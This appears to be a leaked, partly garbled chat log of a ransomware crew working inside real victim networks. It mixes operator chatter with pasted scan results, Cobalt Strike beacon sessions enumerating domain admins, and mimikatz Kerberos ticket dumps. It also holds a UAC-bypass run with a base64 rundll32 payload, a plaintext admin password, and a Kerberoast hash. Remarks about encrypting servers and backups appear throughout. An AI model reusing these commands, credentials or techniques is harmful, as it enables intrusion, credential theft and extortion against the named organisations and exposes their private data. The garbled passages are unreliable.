https://10.0.6.98/login.html PowerEdge T620
http://10.0.6.153/ myshara
http://10.0.6.83/rtknas4.40/ nas
http://10.0.6.54 is requesting your username and password. The site says: "ReadyNAS Admin".
``````
https://10.0.2.32/ui/#/login ESXi'
https://10.0.2.34/ui/#/login
https://10.0.2.36/ui/#/login
https://10.0.2.38/ui/#/login
https://10.0.6.24/ui/
``````
10.0.6.243:80
10.0.6.155:80
10.0.6.153:443
10.0.6.153:80
10.0.6.130:8080
10.0.6.130:443
10.0.6.130:80
10.0.6.124:8080
10.0.6.124:80
10.0.6.117:8080
10.0.6.117:443
10.0.6.117:80
10.0.6.98:443
10.0.6.98:80
10.0.6.96:8080
10.0.6.96:443
10.0.6.96:80
10.0.6.95:443
10.0.6.95:80
10.0.6.86:8080
10.0.6.86:443
10.0.6.86:80
10.0.6.83:443
10.0.6.83:80
10.0.6.73:8080
10.0.6.73:443
10.0.6.73:80
10.0.6.62:443
10.0.6.62:80
10.0.6.58:8080
10.0.6.58:443
10.0.6.58:80
10.0.6.54:443
10.0.6.54:80
10.0.6.109:22 (SSH-2.0-dropbear)
10.0.6.98:22 (SSH-2.0-OpenSSH_7.4)
10.0.6.79:22 (SSH-2.0-dropbear)
10.0.6.155:8080
10.0.6.155:443
10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) nas
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas
10.0.2.39:443
10.0.2.39:80
10.0.2.38:443
10.0.2.38:80
10.0.2.36:443
10.0.2.36:80
10.0.2.35:443
10.0.2.35:80
10.0.2.34:443
10.0.2.34:80
10.0.2.32:443
10.0.2.32:80
10.0.2.31:443
10.0.2.31:80
10.0.2.28:443
10.0.2.28:80
10.0.2.25:443
10.0.2.25:80
10.0.2.21:80
10.0.2.20:80
10.0.2.17:80
10.0.2.15:443
10.0.2.15:80
10.0.2.11:443
10.0.2.11:80
10.0.2.10:443
10.0.2.10:80
10.0.2.8:80
10.0.2.7:80
10.0.2.1:80
10.0.1.179:80
10.0.1.101:80
10.0.2.39:22 (SSH-2.0-OpenSSH_7.4)
10.0.2.38:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.36:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.35:22 (SSH-2.0-OpenSSH_7.4)
10.0.2.34:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.32:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.31:22 (SSH-2.0-OpenSSH_7.4)
10.0.2.17:22 (SSH-2.0-OpenSSH_5.9p1-hpn13v11)
10.0.2.15:22 (SSH-2.0-OpenSSH_7.1)
10.0.2.5:22 (SSH-2.0-dropbear)
10.0.2.4:22 (SSH-2.0-dropbear)
10.0.2.2:22 (SSH-2.0-dropbear)
10.0.1.181:22 (SSH-2.0-dropbear)
10.0.2.3:22 (SSH-2.0-dropbear)
``I got it, can you help dumbo come back before 1 o'clock@tl1 help others? the machine seems to be off
all the sessions are off,the last 10-15 minutes of doing nothing with the session is ok,keep working i ran it without and it worked i'm not sure i need it,no it didn't delete? what do i wait for?
how do you know it worked? shell rundll32 C:\Users\color764\AppData\Local\Packages\AD2F1837.HPPrinterControl_v10z8vjag6ke6\LocalState\HPPrinterControl_v10.dll, ehnpruPontv #generald how to run and what does it do?
```
beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
ORANGE_FACT\Desk_Top_Admin
ORANGE_FACT\Domain Admins
ORANGE_FACT\POSAdmin
The command completed successfully.
beacon> shell net group "Domain admins" /dom
[*] Tasked beacon to run: net group "Domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain vpinc.net.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator avamarbackupuser hpsim
itinfo jf jimfu
jmb jonb kendallr
kr MDJ meraki1
mikedj MSOL_c4e9c8b90962 prtg
prtgnew rd scotttaylor
siem_agent SQLADMIN SQLSYSTEM
Svc_ADSync zscaler
The command completed successfully.
beacon> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain vpinc.net.
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
Administrator jb jf
jmb kr MDJ
mikedj rd scotttaylor
Svc_ADSync
The command completed successfully.
``````
[*] 192.168.168.5:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.168.5:445 - Host could not be identified: Unix (Samba 3.0.33-3.41.el5_11)
[*] 192.168.168.15:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:optional) (uptime:21w 0d 1h 37m 25s) (guid:{ff73b7ae-f1ba-46e5-8e8b-3c9fb9444156}) (authentication domain:PKGPROD)
[+] 192.168.168.15:445 - Host is running Windows 2012 Standard (build:9200) (name:TIMECLOCKSQL) (domain:PKGPROD)
[*] 192.168.168.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:required) (uptime:6d 8h 40m 17s) (guid:{c40e3c81-0bce-4afc-ba0d-e18c58581a0c}) (authentication domain:PKGPROD)
[+] 192.168.168.10:445 - Host is running Windows 2012 Standard (build:9200) (name:2K12SERVER) (domain:PKGPROD)
[*] 192.168.168.1-80: - Scanned 23 of 80 hosts (28% complete)
[*] 192.168.168.1-80: - Scanned 31 of 80 hosts (38% complete)
[*] 192.168.168.1-80: - Scanned 45 of 80 hosts (56% complete)
[*] 192.168.168.1-80: - Scanned 46 of 80 hosts (57% complete)
[*] 192.168.168.1-80: - Scanned 50 of 80 hosts (62% complete)
[*] 192.168.168.1-80: - Scanned 50 of 80 hosts (62% complete)
[*] 192.168.168.54:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 0d 8h 27m 49s) (guid:{56e90780-c2ba-45ef-877d-d2f418746196}) (authentication domain:PKGPROD)
[+] 192.168.168.54:445 - Host is running Windows 8.1 Pro (build:9600) (name:FRONTDESK) (domain:PKGPROD)
[*] 192.168.168.53:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{d0b01a41-07d7-4ad5-a0b6-90c069a5bd26}) (authentication domain:PKGPROD)
[*] 192.168.168.70:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:3d 8h 25m 12s) (guid:{cb8fffad-f637-4c85-b211-e32b405df3ac}) (authentication domain:PKGPROD)
[+] 192.168.168.70:445 - Host is running Windows 8.1 Pro (build:9600) (name:PKG-101) (domain:PKGPROD)
[*] 192.168.168.63:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 0d 8h 28m 22s) (guid:{ac014121-b0c2-442a-93b8-d2c98f8c66e2}) (authentication domain:PKGPROD)
[+] 192.168.168.63:445 - Host is running Windows 8.1 Pro (build:9600) (name:PKG-102) (domain:PKGPROD)
[*] 192.168.168.1-80: - Scanned 56 of 80 hosts (70% complete)
[*] 192.168.168.73:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{ce91e8ea-649b-4aa0-b6e3-81718f694399}) (authentication domain:PKGPROD)
[*] 192.168.168.66:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{62b17fea-9ad5-4532-92cf-8276e5e90b86}) (authentication domain:PKGPROD)
[*] 192.168.168.1-80: - Scanned 71 of 80 hosts (88% complete)
[*] 192.168.168.1-80: - Scanned 80 of 80 hosts (100% complete)
[*] Auxiliary module execution completed
``https://kali.tools/?p=5342что for thin clients?'' script runs `` ACUCOBOL-GT Web Thin Client ````
' Location of file with usernames and human-readable terminal numbers
SouthWareUsersFile = "swusers\swusers.txt"
``what's up?
beacon> mimikatz kerberos::list
[*] Tasked beacon to run mimikatz's kerberos::list command
[+] host called home, sent: 706120 bytes
[+] received output:
[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; forwardable ;
[00000001] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 8:27:44 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
[00000002] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/18/2020 4:48:38 AM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
Server Name : RPCSS/2K12SERVER.pkgprod.local @ PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;
[00000003] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
Server Name : ldap/2k12server.pkgprod.local @ PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;
[00000004] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
Server Name : cifs/2k12server.pkgprod.local/pkgprod.local @ PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;
[00000005] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 9:06:32 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
Server Name : LDAP/2k12server.pkgprod.local/pkgprod.local @ PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;
``````
(ARP) Target '192.168.168.10' is alive. (ARP) Target '192.168.168.15' is alive. 00-15-5D-A8-0A-039C
(ARP) Target '192.168.168.5' is alive. -(ARP) Target '192.168.168.1' is alive. 008E2C---1599B8---5D5BED---A88823---0A6A3A-
-0100
[+] received output:
(ARP) Target '192.168.168.54' is alive. (ARP) Target '192.168.168.53' is alive. 64F4--5139--0609--551A--08EA--50A7
(ARP) Target '192.168.168.63' is alive. A0-48-1C-99-8D-D8
(ARP) Target '192.168.168.50' is alive. 98-8B-0A-C2-59-08
(ARP) Target '192.168.168.66' is alive. (ARP) Target '192.168.168.70' is alive. F4A0--3948--091C--0F99--9B8E--A8AD
(ARP) Target '192.168.168.73' is alive. 9C-7B-EF-AD-76-64
[+] received output:
(ARP) Target '192.168.168.88' is alive. 00-11-0A-F7-EA-A8
[+] received output:
(ARP) Target '192.168.168.231' is alive. 00-AF-1F-6F-A2-E1
[+] received output:
192.168.168.73:3389
[+] received output:
192.168.168.73:139
192.168.168.73:135
[+] received output:
192.168.168.70:3389
[+] received output:
192.168.168.70:664
[+] received output:
192.168.168.70:623
[+] received output:
192.168.168.70:139
192.168.168.70:135
[+] received output:
192.168.168.66:3389
[+] received output:
192.168.168.66:139
192.168.168.66:135
[+] received output:
192.168.168.63:3389
[+] received output:
192.168.168.63:664
[+] received output:
192.168.168.63:623
[+] received output:
192.168.168.63:139
192.168.168.63:135
[+] received output:
192.168.168.54:664
[+] received output:
192.168.168.54:139
192.168.168.54:135
[+] received output:
192.168.168.53:3389
[+] received output:
192.168.168.53:139
192.168.168.53:135
[+] received output:
192.168.168.50:554
[+] received output:
192.168.168.50:80
[+] received output:
192.168.168.15:5985
192.168.168.15:5949
192.168.168.15:5948
[+] received output:
192.168.168.15:5504
[+] received output:
192.168.168.15:3389
[+] received output:
192.168.168.15:443
[+] received output:
192.168.168.15:139
192.168.168.15:135
192.168.168.15:80
192.168.168.10:5985
192.168.168.10:5949
192.168.168.10:5948
[+] received output:
192.168.168.10:3389
[+] received output:
192.168.168.10:636
[+] received output:
192.168.168.10:593
[+] received output:
192.168.168.10:464
[+] received output:
192.168.168.10:389
192.168.168.10:139
192.168.168.10:135
[+] received output:
192.168.168.10:88
192.168.168.10:53
192.168.168.5:5632
[+] received output:
192.168.168.5:631
192.168.168.5:609
[+] received output:
192.168.168.5:139
192.168.168.5:111
192.168.168.5:22 (SSH-2.0-OpenSSH_4.3)
[+] received output:
192.168.168.1:443
[+] received output:
192.168.168.1:80
192.168.168.1:22 (SSH-2.0-OpenSSH_7.2)
192.168.168.5:445 (platform: 500 version: 4.9 name: PKGPROD domain: MYGROUP)
192.168.168.10:445 (platform: 500 version: 6.2 name: 2K12SERVER domain: PKGPROD)
192.168.168.15:445 (platform: 500 version: 6.2 name: TIMECLOCKSQL domain: PKGPROD)
192.168.168.53:445 (platform: 500 version: 10.0 name: SALES2-HP-2019 domain: PKGPROD)
192.168.168.54:445 (platform: 500 version: 6.3 name: FRONTDESK domain: PKGPROD)
192.168.168.63:445 (platform: 500 version: 6.3 name: PKG-102 domain: PKGPROD)
192.168.168.66:445 (platform: 500 version: 10.0 name: BARBARA-HP-2019 domain: PKGPROD)
192.168.168.70:445 (platform: 500 version: 6.3 name: PKG-101 domain: PKGPROD)
192.168.168.73:445 (platform: 500 version: 10.0 name: SALES1-HP-2019 domain: PKGPROD)
Scanner module is complete
``````
Windows IP Configuration
Host Name . . . . . Sales1-HP-2019
Primary Dns Suffix . . . . ♪ pkgprod.local ♪
Node Type ... ... . .: Hybrid
IP Routing Enabled . . . . : No.
WINS Proxy Enabled. .: No
DNS Suffix Search List. : pkgprod.local
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . . : pkgprod.local
Description . . . . . : Realtek PCIe GbE Family Controller
Physical Address . . . . .: 9C-7B-EF-AD-76-64
DHCP Enabled. . . . . .: Yes
Autoconfiguration Enabled . .: Yes
Link-local IPv6 Address. : fe80::994:371f:ea5d:17bb%7(Preferred)
IPv4 Address . . . . : 192.168.168.73(Preferred)
Subnet Mask . . . . : 255.255.255.0
Lease Obtained... on... ♪ Monday, September 14, 2020 6:18:32 PM ♪
Lease Expires . . . . .: Tuesday, September 22, 2020 6:18:28 PM
Default Gateway . . . . : 192.168.168.1
DHCP Server . . . . : 192.168.168.10
DHCPv6 IAID . . . . : 110918639
DHCPv6 Client DUID . . . . : 00-01-00-01-24-C4-86-07-9C-7B-EF-AD-76-64
DNS Servers . . . . : 192.168.168.10
Primary WINS Server . . . . : 192.168.168.10
NetBIOS over Tcpip-- : Enabled
``Not sure there's going to be a session again kidalidll kinli?[ ](https://mediaeveryone.com/group/sccy-com?msg=ZRJ3v6qNBEGCHKYis) here```
10.1.4.250:80 --alibi
10.1.4.211:443 -- it did not open
10.1.4.211:80
10.1.4.151:80 -- did not open
10.0.0.104:22 (SSH-2.0-dropbear_2018.76)
10.0.0.104:443
10.0.0.104:80 -- 503 Service Not Available
10.0.0.210:80 -- Web Service tab, did not open
``````
10.0.0.5:445 (platform: 500 version: 10.0 name: SCCY-DC domain: SCCY)
10.0.0.17:445 (platform: 500 version: 10.0 name: SCCY-14 domain: SCCY)
10.0.0.24:445 (platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER)
10.0.0.26:445 (platform: 500 version: 10.0 name: SCCY-LT07 domain: SCCY)
10.0.0.38:445
10.0.0.40:445 (platform: 500 version: 10.0 name: SCCY-04 domain: SCCY)
10.0.0.41:445 (platform: 500 version: 10.0 name: SCCY-10 domain: SCCY)
10.0.0.45:445
10.0.0.51:445 (platform: 500 version: 6.1 name: SCCY-DATTO domain: WORKGROUP)
10.0.0.57:445 (platform: 500 version: 10.0 name: SCCY-03 domain: SCCY)
10.0.0.59:445 (platform: 500 version: 10.0 name: SCCY-05 domain: SCCY)
10.0.0.62:445 (platform: 500 version: 10.0 name: SCCY-19 domain: SCCY)
10.0.0.63:445
10.0.0.67:445 (platform: 500 version: 10.0 name: SCCY-LT04 domain: SCCY)
10.0.0.71:445 (platform: 500 version: 10.0 name: SCCY-LT05 domain: SCCY)
10.0.0.75:445 (platform: 500 version: 10.0 name: SCCY-LT3 domain: SCCY)
10.0.0.76:445 (platform: 500 version: 10.0 name: SCCY-01 domain: SCCY)
10.0.0.82:445 (platform: 500 version: 10.0 name: CONNIE-MICRO domain: SCCY)
10.0.0.83:445
10.0.0.84:445 (platform: 500 version: 10.0 name: SCCY-02 domain: SCCY)
10.0.0.89:445 (platform: 500 version: 10.0 name: JOE-AIO2 domain: SCCY)
10.0.0.91:445 (platform: 500 version: 10.0 name: SCCY-RECEIVING domain: SCCY)
10.0.0.93:445 (platform: 500 version: 6.1 name: QVPRO-PC domain: SCCY)
10.0.0.102:445 (platform: 500 version: 10.0 name: SCCY-16 domain: SCCY)
10.0.0.103:445 (platform: 500 version: 10.0 name: JOE-BOXX-W10 domain: SCCY)
10.0.0.110:445 (platform: 500 version: 10.0 name: MFGWIN10-1 domain: SCCY)
10.0.0.111:445 (platform: 500 version: 10.0 name: SCCY-12 domain: SCCY)
10.0.0.113:445 (platform: 500 version: 10.0 name: QATRACKING domain: SCCY)
10.0.0.116:445 (platform: 500 version: 10.0 name: SCCY-18 domain: SCCY)
10.0.0.118:445 (platform: 500 version: 10.0 name: SCCY-15 domain: SCCY)
10.0.0.119:445 (platform: 500 version: 10.0 name: SCCY-09 domain: SCCY)
10.0.0.123:445 (platform: 500 version: 10.0 name: SCCY-11 domain: SCCY)
10.0.0.128:445 (platform: 500 version: 10.0 name: SCCY-08 domain: SCCY)
10.0.0.146:445 (platform: 500 version: 10.0 name: SCCY-06 domain: SCCY)
10.0.0.147:445 (platform: 500 version: 10.0 name: SCCY-21 domain: SCCY)
10.0.0.148:445 (platform: 500 version: 10.0 name: SCCY-13 domain: SCCY)
10.0.0.252:445 (platform: 500 version: 10.0 name: TS domain: SCCY)
10.0.30.117:445
10.0.30.118:445
10.0.30.123:445
10.0.30.143:445 (platform: 500 version: 10.0 name: SCCY-07 domain: SCCY)
10.0.30.147:445 (platform: 500 version: 10.0 name: SCCY-TN01 domain: SCCY)
Scanner module is complete
``````
10.0.0.104:22 (SSH-2.0-dropbear_2018.76)
10.0.0.104:443
10.0.0.104:80 --br
10.0.0.122:443
10.0.0.122:80
10.0.0.132:22 (SSH-2.0-OpenSSH_7.8) --- BR
10.0.0.132:443
10.0.0.132:80
10.0.0.134:22 (SSH-2.0-OpenSSH_7.8) ---BR
10.0.0.134:443
10.0.0.134:80
10.0.0.151:22 (SSH-2.0-OpenSSH_6.6) --BR
10.0.0.151:443
10.0.0.151:80
10.0.0.152:80
10.0.0.153:80
10.0.0.15:443
10.0.0.154:80
10.0.0.16:443 PRINTER
10.0.0.16:80
10.0.0.199:443 BROWSER!!!!! VPN
10.0.0.199:80
10.0.0.200:443 BROWSER!!! CANON
10.0.0.200:80
10.0.0.201:443 BROWSER!!! CANON
10.0.0.201:80
10.0.0.202:80 HZ BROWSER!!! ALIBI AV?
10.0.0.203:443 CANON
10.0.0.203:80
10.0.0.204:443 CANON
10.0.0.204:80
10.0.0.205:443 CANON
10.0.0.205:80
10.0.0.206:443 CANON
10.0.0.206:80
10.0.0.210:80 ?????
10.0.0.215:80 ZEBRA
10.0.0.21:80 NETGEAR router
10.0.0.230:22 (SSH-2.0-mpSSH_0.2.1) HP iLO SQLSRVR VHOST
10.0.0.230:80
10.0.0.235:80
10.0.0.236:80
10.0.0.237:80
10.0.0.24:80 IIS
10.0.0.252:443 RD Web Access
10.0.0.252:80
10.0.0.29:22 (SSH-2.0-dropbear_2018.76) HZ ????
10.0.0.29:443
10.0.0.29:80
10.0.0.30:22 (SSH-2.0-dropbear_2013.59)
10.0.0.34:443
10.0.0.34:80
10.0.0.39:22 (SSH-2.0-OpenSSH_6.1)
10.0.0.42:22 (SSH-2.0-OpenSSH_6.1)
10.0.0.43:80 ALLWORKS
10.0.0.4:443 NAS Synology !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
10.0.0.4:80
10.0.0.46:22 (SSH-2.0-dropbear_2018.76) HZ ????
10.0.0.46:443
10.0.0.46:80
10.0.0.49:22 (SSH-2.0-OpenSSH_6.1)
10.0.0.50:443 CANON
10.0.0.50:80
10.0.0.51:443 NAS ?!?!?
10.0.0.51:80
10.0.0.52:22 (SSH-2.0-dropbear_2018.76) HZ ?????
10.0.0.52:443
10.0.0.52:80
10.0.0.55:443
10.0.0.55:80
10.0.0.67:80
10.0.0.6:80
10.0.0.90:443
10.0.0.90:80
10.0.0.99:80
10.0.30.100:22 (SSH-2.0-dropbear_2018.76) HZ ?????
10.0.30.100:443
10.0.30.100:80
10.0.30.101:22 (SSH-2.0-dropbear_2018.76) HZ ?????
10.0.30.101:443
10.0.30.101:80
10.0.30.119:443
10.0.30.119:80
10.0.30.126:80
10.0.30.127:22 (SSH-2.0-dropbear_2018.76) HZ ???
10.0.30.127:443
10.0.30.127:80
10.0.30.128:80
10.0.30.129:80
10.0.30.130:80
10.0.30.131:80
10.0.30.132:80
10.0.30.133:80
10.0.30.30:22 (SSH-2.0-OpenSSH_6.1)
10.0.30.4:443 SWITCH
10.0.30.4:80
10.0.30.5:443
10.0.30.5:80
10.0.40.2:443
10.0.40.2:80
``````
10.1.4.250:80 -br
10.1.4.211:443 -br
10.1.4.211:80
10.1.4.175:443 -NAS
10.1.4.175:80
10.1.4.175:22 (SSH-2.0-OpenSSH_7.4)
10.1.4.175:445
10.1.4.162:80 - phone?
10.1.4.153:80 -phone
10.1.4.152:80 -phone
10.1.4.151:80 -br
10.1.4.80:80 -phone
10.1.4.254:22 (SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2)
10.1.4.154:22 (SSH-2.0-dropbear_2016.74)
10.1.4.168:22 (SSH-2.0-OpenSSH_6.1)
10.1.4.99:445
10.1.4.205:445
10.1.4.210:445
10.1.4.221:445
10.1.4.230:445
``````
10.0.30.147:3389
10.0.30.143:3389
10.0.30.133:80
10.0.30.132:80
10.0.30.131:80
10.0.30.130:80
10.0.30.129:80
10.0.30.128:80
10.0.30.127:443
10.0.30.127:80
10.0.30.126:80
10.0.30.127:22 (SSH-2.0-dropbear_2018.76)
10.0.30.119:8080
10.0.30.119:443
10.0.30.119:80
10.0.30.101:443
10.0.30.101:80
10.0.30.100:443
10.0.30.100:80
10.0.30.1:8080
10.0.30.100:22 (SSH-2.0-dropbear_2018.76)
10.0.30.101:22 (SSH-2.0-dropbear_2018.76)
10.0.30.30:22 (SSH-2.0-OpenSSH_6.1)
10.0.30.117:445
10.0.30.123:445
10.0.30.143:445 (platform: 500 version: 10.0 name: SCCY-07 domain: SCCY)
10.0.30.147:445 (platform: 500 version: 10.0 name: SCCY-TN01 domain: SCCY)
8 are not pinged, 12 of them are dcpc's that have some sort of exh in ad_ocmp
```
Jdodc50.jdossn.local
Jdodc51.jdossn.local
JDOdc65.jdossn.local
JDODC12.jdossn.local
JDODC64.jdossn.local
JDODC61.jdossn.local
JDODC63.jdossn.local
JDODC66.jdossn.local
JDODC62.jdossn.local
JDOEXVS01.jdossn.local
JDOEXVS03.jdossn.local
JDOEXHYBRID02.jdossn.local
JDOEXCH03.jdossn.local
JDOEXHYBRID01.jdossn.local
jdoexhybrid03.jdossn.local
JDOEXVS02.jdossn.local
JDOINFADMIN01.jdossn.local
JDODC67.jdossn.local
JDODC68.jdossn.local
JDODC69.jdossn.local
``````
User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:24:41> shell ping JDOEXVS01 -n 1
[*] Tasked beacon to run: ping JDOEXVS01 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXVS01. Please check the name and try again.
User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:25:28> shell ping JDOEXVS03 -n 1
[*] Tasked beacon to run: ping JDOEXVS03 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXVS03. Please check the name and try again.
User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:26:02> shell ping JDOEXHYBRID02 -n 1
[*] Tasked beacon to run: ping JDOEXHYBRID02 -n 1
[+] host called home, sent: 54 bytes
[+] received output:
Pinging JDOEXHYBRID02.jdossn.local [172.31.190.92] with 32 bytes of data:
Request timed out.
Ping statistics for 172.31.190.92:
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:26:51> shell ping JDOEXCH03 -n 1
[*] Tasked beacon to run: ping JDOEXCH03 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXCH03. Please check the name and try again.
User 7[W08872611194]nddeviowlbo/3856|202020Oct24 03:27:18> shell ping JDOEXHYBRID01 -n 1
[*] Tasked beacon to run: ping JDOEXHYBRID01 -n 1
[+] host called home, sent: 54 bytes
[+] received output:
Ping request could not find host JDOEXHYBRID01. Please check the name and try again.
User 7[W08872611194]nddeviowlbo/3856|202020Oct24 03:27:49> shell ping JDOEXHYBRID03 -n 1
[*] Tasked beacon to run: ping JDOEXHYBRID03 -n 1
[+] host called home, sent: 54 bytes
[+] received output:
Pinging JDOEXHYBRID03.jdossn.local [172.31.190.93] with 32 bytes of data:
Request timed out.
Ping statistics for 172.31.190.93:
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
User 7[W08872611194]nddeviowlbo/3856|202020Oct24 03:28:24> shell ping JDOEXVS02 -n 1
[*] Tasked beacon to run: ping JDOEXVS02 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXVS02. Please check the name and try again.
``This is the first time I have heard of lumisco.com, matches, gpjdahocorpin? You now have 3 grids in operation, before you leave, report on each: what was done in the current task, what difficulties, what vectors and so on, started up yes?
oh how well in the test lab on Windows 10 version 1909 with defender on
SharpFodhelperBypass works (https://github.com/FatRodzianko/SharpFodhelperBypass)
sample run - execute-assembly /home/user/Desktop/SharpFodhelperBypass.exe Y21kIC9jIHJ1bmRsbDMyIEM6XFByb2dyYW1EYXRhXHg2NC5kbGwgZW50cnlQb2ludA==
command in base64 (cmd /c rundll32 C:\ProgramData\x64.dll entryPoint)[ ](https://mediaeveryone.com/channel/general?msg=hhBzAGf6Z9ZQ27wgX) This thing works in a test lab on win 10
It opens cmd under admin, but you can't give it arguments, i.e. tell it to run our exe or specify a command.
what can be done with it then? https://github.com/hfiref0x/UACMEhttps://github.com/L3cr0f/DccwBypassUACэто till lunchtime the problem is above + you need to look for methods of bypassing UAC, or fresh spoolsv[ ](https://mediaeveryone.com/channel/general?msg=yjAALDWw963Zv3b8j) On the forum lies, gave the link above
Finish it is not realistic, I think it's infinite:space_invader:mindmap finished?
LEADMIN
Deere0419!
``have a clear''.
$krb5tgs$23$aspsql2svc$mapciasp.com$MSSQLSvc/ASPSQL2.mapciasp.com:1433$7fbb03b44cb498cea3660dc0f17f4326$ceb193be15a7b0299bebe7bab2a50a7a53ea924fc555d8111667f9ab4de458b220f36f08a7e3b1965bbca55cf7f09f1ef255ad630bac1580000e3ad222a320d342db4bc833e2e4c257e52553197bd338defb57b236c9e6192090c832a419e665b511163e0bafaa90690232dde95a5650f6a6b8fd5c78fd5e49ec4879816f7441971213d2861ad7e20412c549cc8517677d53552b83756a2f54baeb38497f60e8d7eb60b9d7a19bff49501606fdde848e2da8b8a128bab34c77fff5aea18d130c6c2818877ef059fb0009a8dafe7c03028c02ddde72672bb4e09bfbd6f6b91aff72c0e45203a12307ce38d4cfaaf48cc5b1d000e68c11bea41766b207657ee15bf5115caee8b5f42ac242857f921dc68963365579ab5245a9a261d2eb551e5e8fea013839d1aa991483c2ef6fe3117974aad6d6e6e358d4a3af20f6760c5aa13a6bae5ca8dfa9e2941744d664212581a6206695ac7d817f4f6a0114e5fc5cdf87bb5f3887c24dc31a71ebc0bf75c668e6bc1f422ac0e38d06570948272e87e7d532bb690ee6f62287866abed4b45b094f37ad2256a971bde09f18628d8e700fe5fa66402b0f656b03ffbce97d66e7035a7704a341e05b78f627ca42bc06c0154b4033889e7475b1b10d442a54f9f95e3ae67260de4fab6226b210fc0ca67da8785b42b01f1d84bac9ca7860dfbamap#2013
``Listings separately and add where there are no filesnet you have not uploaded the listings to the mags? probably roll out the other day we are trying to think of a fileless solution that would work at least through the sessionprivet, alas, I do not know
it's almost unrealistic given that you need contextWell, or at least history, even if without passwordsHi, do you know if there is something that works on the principle of SessionGopher only for browser Credits? 1.done.overland.com until tomorrow goodnightbz tomorrow by 6noon then we all are ok? bitches) there is one full disk encrypted - file dump
and 60% c backups + filesfflagged us and part of the servers(what is the movement at least 40 minjm us encrypted?
overland
servers
hell:76
alive:36
closed:36
armies
for hell:327
alive:82
closed:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82 ants:82
ovrweb
servers
by hell:10
